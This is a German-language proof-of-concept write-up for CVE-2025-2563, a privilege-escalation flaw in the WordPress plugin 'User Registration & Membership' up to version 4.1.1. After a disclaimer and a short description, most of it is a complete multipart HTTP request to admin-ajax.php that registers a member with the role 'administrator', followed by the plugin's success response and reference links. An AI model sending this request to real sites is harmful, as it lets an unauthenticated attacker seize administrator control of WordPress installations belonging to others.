
CVE-2025-2563 PoC
Die in dieser CVE (Common Vulnerabilities and Exposures) Zusammenfassung dargestellten Informationen dienen ausschließlich Bildungs- und Informationszwecken. Die bereitgestellten Details basieren auf öffentlich zugänglichen Ressourcen, Recherchen und Analysen des Autors. Der Inhalt ist nicht dazu gedacht, illegale Aktivitäten, einschließlich Hacking, Ausnutzung oder unbefugtem Zugriff auf Systeme, zu fördern oder zu ermutigen.
Der Autor übernimmt keinerlei Verantwortung für einen Missbrauch der dargestellten Informationen. Es wird empfohlen, dass Einzelpersonen und Organisationen dieses Wissen verantwortungsvoll und in Übereinstimmung mit den geltenden Gesetzen und Vorschriften anwenden. Leser werden nachdrücklich aufgefordert, Schwachstellen nur in kontrollierten Umgebungen mit entsprechender Genehmigung zu testen.
Der Autor und die Mitwirkenden dieser Zusammenfassung unterstützen keine böswilligen Aktivitäten und befürworten eine verantwortungsvolle Offenlegung sowie ethische Hacking-Praktiken.
Eine kritische Sicherheitslücke wurde im WordPress-Plugin „User Registration & Membership“ entdeckt, einem beliebten Tool zur Erstellung von Mitgliedschaftsseiten und Registrierungsformularen. Der Fehler, identifiziert als CVE-2025-2563, hat einen CVSS-Score von 9,8, was auf seine hohe Schwere hindeutet.
Das User Registration & Membership Plugin für WordPress ist in Versionen bis einschließlich 4.1.1 anfällig für eine Privilegieneskalation. Dies liegt an unzureichenden Einschränkungen des Rollentyps in der Funktion 'prepare_members_data()'. Dies ermöglicht es nicht authentifizierten Angreifern, neue Benutzerkonten mit der Rolle 'Administrator' zu erstellen, unter folgenden Bedingungen:
POST /wp-admin/admin-ajax.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: */*
Host: hackthebox.test
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Type: multipart/form-data; boundary=--------------------------189123966817005614765335
----------------------------189123966817005614765335
Content-Disposition: form-data; name="action"
user_registration_membership_register_member
----------------------------189123966817005614765335
Content-Disposition: form-data; name="security"
THE_NONCE_HERE
----------------------------189123966817005614765335
Content-Disposition: form-data; name="members_data"
{"membership":"MEMBERSHIP_ID","payment_method":"free","start_date":"2025-3-29","username":"REGISTERED_USERNAME","role":"administrator"}
----------------------------189123966817005614765335--
{
"success": true,
"data": {
"member_id": 24,
"transaction_id": "",
"message": "New member has been successfully created."
}
}
- https://plugins.trac.wordpress.org/browser/user-registration/tags/4.1.2/modules/membership/includes/Admin/Services/MembersService.php?rev=3259656#L106
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/user-registration/user-registration-membership-411-unauthenticated-privilege-escalation
- https://securityonline.info/wordpress-plugin-cve-2025-2563-scores-9-8-threatens-thousands-of-membership-sites/